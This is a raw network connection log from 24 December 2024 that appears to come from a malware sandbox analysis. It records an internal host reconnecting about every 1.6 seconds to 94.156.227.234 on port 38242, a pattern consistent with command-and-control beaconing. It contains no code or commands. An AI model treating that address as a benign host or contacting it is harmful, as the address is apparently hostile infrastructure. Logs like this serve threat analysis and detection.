Dec 24, 2024 09:43:20.406434059 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:20.525883913 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:20.910229921 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:21.077296019 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:21.538584948 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:21.538698912 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:21.911261082 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:22.030901909 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:22.030985117 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:22.031012058 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:22.151113987 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:22.535092115 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:22.696763992 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:23.155240059 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:23.155329943 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:23.536381960 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:23.656048059 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:23.656151056 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:23.656183004 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:23.775747061 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:24.160207987 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:24.320624113 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:24.785149097 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:24.785350084 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:24.936492920 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 09:43:25.161133051 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:25.280783892 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:25.280977964 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:25.281027079 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:25.400621891 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:25.784953117 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:25.948736906 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:26.403199911 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:26.403300047 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:26.785814047 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:26.905627966 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:26.905713081 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:26.905747890 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:27.025538921 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:27.408911943 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:27.572597027 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:28.037739038 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:28.037834883 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:28.409662962 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:28.529416084 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:28.529493093 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:28.529544115 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:28.649635077 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:29.032099009 CET	42516	80	192.168.2.23	109.202.202.202
Dec 24, 2024 09:43:29.032295942 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:29.192764997 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:29.657926083 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:29.658001900 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:30.033103943 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:30.153145075 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:30.153228045 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:30.153384924 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:30.272883892 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:30.661104918 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:30.824587107 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:31.288706064 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:31.288762093 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:31.662138939 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:31.781909943 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:31.782061100 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:31.782104969 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:31.901840925 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:32.285322905 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:32.448707104 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:32.916029930 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:32.916121960 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:33.286278963 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:33.406055927 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:33.406162024 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:33.406232119 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:33.525865078 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:33.909100056 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:34.072563887 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:34.528112888 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:34.528191090 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:34.910185099 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:35.029759884 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:35.029844046 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:35.029999971 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:35.149828911 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:35.533500910 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:35.696774006 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:36.146682024 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:36.146888971 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:36.534286976 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:36.654042006 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:36.654124975 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:36.654352903 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:36.773998976 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:37.157919884 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:37.320600986 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:37.797312021 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:37.797509909 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:38.158720016 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:38.278776884 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:38.278886080 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:38.278913021 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:38.398682117 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:38.782304049 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:38.944700956 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:39.408946991 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:39.409025908 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:39.783129930 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:39.902797937 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:39.902868032 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:39.902898073 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:40.022568941 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:40.405812979 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:40.568634987 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:41.036907911 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:41.037164927 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:41.406987906 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:41.526704073 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:41.526802063 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:41.526863098 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:41.646596909 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:42.030905962 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:42.192615032 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:42.661006927 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:42.661181927 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:43.032268047 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:43.152133942 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:43.152354002 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:43.152354956 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:43.271989107 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:43.663902998 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:43.828619957 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:44.282516956 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:44.282779932 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:44.665880919 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:44.785682917 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:44.785984039 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:44.785984039 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:44.905690908 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:45.290657043 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:45.452697039 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:45.922760010 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:45.923227072 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:46.291851997 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:46.412751913 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:46.412868977 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:46.413044930 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:46.532584906 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:46.918164968 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:47.080718994 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:47.543870926 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:47.544168949 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:47.920228004 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:48.040157080 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:48.040283918 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:48.040469885 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:48.160051107 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:48.546947956 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:48.712620020 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:49.155481100 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:49.155669928 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:49.548999071 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:49.669542074 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:49.669775009 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:49.669775963 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:49.789745092 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:50.176681995 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:50.337913036 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:50.791486025 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:50.791650057 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:51.178181887 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:51.298357010 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:51.298479080 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:51.298556089 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:51.418165922 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:51.804150105 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:51.964595079 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:52.418338060 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:52.418626070 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:52.805898905 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:52.925689936 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:52.925990105 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:52.925990105 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:53.045624018 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:53.431297064 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:53.592699051 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:53.604625940 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 09:43:54.063667059 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:54.063968897 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:54.433387041 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:54.553081036 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:54.558135986 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:54.558135986 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:54.677875042 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:55.065808058 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:55.228658915 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:55.685247898 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:55.685379028 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:56.067107916 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:56.186770916 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:56.186970949 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:56.186970949 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:56.306648016 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:56.691662073 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:56.852520943 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:57.308049917 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:57.308254957 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:57.693013906 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:57.813199043 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:57.813405037 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:57.813566923 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:57.933125973 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:58.318645000 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:58.480562925 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:58.945328951 CET	38242	60088	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:58.945513964 CET	60088	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:59.319916964 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:59.439697981 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:59.439914942 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:59.439959049 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:59.559859037 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:59.944291115 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:00.108720064 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:00.566977978 CET	38242	60090	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:00.567151070 CET	60090	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:00.945517063 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:01.065325022 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:01.065589905 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:01.065638065 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:01.185668945 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:01.570605993 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:01.732546091 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:02.183693886 CET	38242	60092	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:02.184001923 CET	60092	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:02.571548939 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:02.691339016 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:02.691574097 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:02.691574097 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:02.811333895 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:03.197510958 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:03.364629984 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:03.806947947 CET	38242	60094	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:03.807149887 CET	60094	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:04.199110985 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:04.319154024 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:04.319309950 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:04.319338083 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:04.439117908 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:04.826606989 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:04.988599062 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:05.446605921 CET	38242	60096	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:05.446783066 CET	60096	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:05.828156948 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:05.947741032 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:05.947885036 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:05.947915077 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:06.067739010 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:06.451534033 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:06.612938881 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:07.078002930 CET	38242	60098	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:07.078221083 CET	60098	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:07.452951908 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:07.572622061 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:07.572783947 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:07.572885990 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:07.692460060 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:08.080779076 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:08.240577936 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:08.693123102 CET	38242	60100	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:08.693317890 CET	60100	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:09.082751989 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:09.202801943 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:09.202930927 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:09.203138113 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:09.322695971 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:09.709466934 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:09.872575998 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:10.325439930 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:10.325609922 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:10.711343050 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:10.831095934 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:10.831243992 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:10.831361055 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:10.951141119 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:11.336342096 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:11.500716925 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:11.974750996 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:11.975003958 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:12.337871075 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:12.457590103 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:12.457741022 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:12.457815886 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:12.577523947 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:12.965022087 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:13.128561020 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:13.572640896 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:13.572822094 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:13.967015982 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:14.088570118 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:14.088741064 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:14.088804960 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:14.208470106 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:14.594145060 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:14.756625891 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:15.216005087 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:15.216281891 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:15.595909119 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:15.717497110 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:15.717746019 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:15.717844963 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:15.837486029 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:16.224329948 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:16.384701014 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:16.838068008 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:16.838382006 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:17.226238012 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:17.346110106 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:17.346374989 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:17.346374989 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:17.466057062 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:17.852500916 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:18.012521029 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:18.467658997 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:18.467957020 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:18.854171038 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:18.975308895 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:18.975598097 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:18.975720882 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:19.095202923 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:19.482239962 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:19.648577929 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:20.100305080 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:20.100532055 CET	60114	38242	192.168.2.23	94.156.227.234
